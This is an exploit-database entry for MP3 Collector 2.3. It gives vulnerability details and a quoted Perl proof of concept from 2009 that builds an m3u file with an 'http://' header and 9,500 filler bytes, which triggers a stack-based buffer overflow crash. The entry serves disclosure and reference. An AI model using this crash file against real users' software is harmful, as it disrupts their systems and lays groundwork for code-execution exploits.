header-logo
Suggest Exploit
vendor:
MP3 Collector
by:
zAx
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: MP3 Collector
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:collectorz.com:mp3_collector
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MP3 Collector 2.3 (m3u File) Local Crash PoC

A buffer overflow vulnerability exists in MP3 Collector 2.3 when a specially crafted m3u file is opened. The vulnerability is caused due to a boundary error when handling the http:// header in the m3u file. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted m3u file.

Mitigation:

Upgrade to the latest version of MP3 Collector 2.3
Source

Exploit-DB raw data:

#!/usr/bin/perl
# MP3 Collector 2.3 (m3u File) Local Crash PoC
# By : zAx
# Application Homepage : http://collectorz.com
# Application Download : http://downloads.collectorz.com/mp3collectorsetup.exe
# Go to Playlist menu, select Open Playlist, Select the File and a click on file name.

$header = "http://";
$crash = "\x41" x 9500; # Just a Random size .
my $file = "CraSH.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $header.$crash;
close($FILE);
print "Done \n";

# milw0rm.com [2009-09-15]

Navigation

Suggest Exploit

Services By CQR